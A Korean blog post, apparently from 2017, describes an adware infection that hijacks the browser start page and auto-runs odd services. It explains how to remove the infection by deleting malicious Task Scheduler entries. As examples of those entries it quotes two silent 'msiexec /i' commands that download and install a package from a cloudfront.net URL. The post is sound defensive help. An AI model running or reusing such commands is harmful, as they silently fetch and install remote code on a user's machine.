* 증상
- 인터넷 브라우저 시작페이지 바뀜
- 다양한 프로세스와 서비스가 자동 실행됨
C:\Windows\System32\svchost.exe -k Kitty -s
Kitty.dll
svchost.exe -k WinSAPSvc
svchost.exe -k SNARE
C:\Program Files (x86)\MIO\MIO.exe
C:\Windows\psgo\psgo.ps1
Antanna
{0BC3B616-092D-4303-86DE-CB69DC1E7C51}\_ALLOWDEL_32c8f
* 해결 방법
- 바이러스 검사
- Malwarebytes 로 검사
- 하지만 이후에도 계속해서 주기적으로 감염된다
- 작업스케줄러 설정
(내컴퓨터 우클릭 -> 관리)
- 시스템 도구 -> 작업 스케줄러 -> 작업 스케줄러 라이브러리
- msiexec.exe 이후 인터넷 주소가 있는 작업을 찾아서 없앤다
<예>
Piwuied
msiexec /i hTTp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=Samsuxxxxxxxxxxxxxxxxxxxxxx&d=20170409 /q
Samsung Update
msiexec /i hTtP://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=Samsxxxxxxxxxxxxxxxxxxxxxxx&d=20170426 /q
//=================
//참고
Microsoft Sysinternals Suite의 Autoruns를 너무 철썩같이 믿다가 2~3주 고생
Farbar Recovery Scan Tool
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
'IT' 카테고리의 다른 글
| 구글, '객체 탐지 기술' 오픈소스로 공개 (0) | 2017.06.19 |
|---|---|
| 윈도우 10 버전 역사 (& GUI OS 역사) (0) | 2017.05.15 |
| 알렉사 사이트 순위 (0) | 2017.02.05 |
| 파일 검색 프로그램 추천 - Everything (0) | 2016.12.14 |
| Windows 10 부팅에러 해결 방법 (1) | 2016.06.01 |
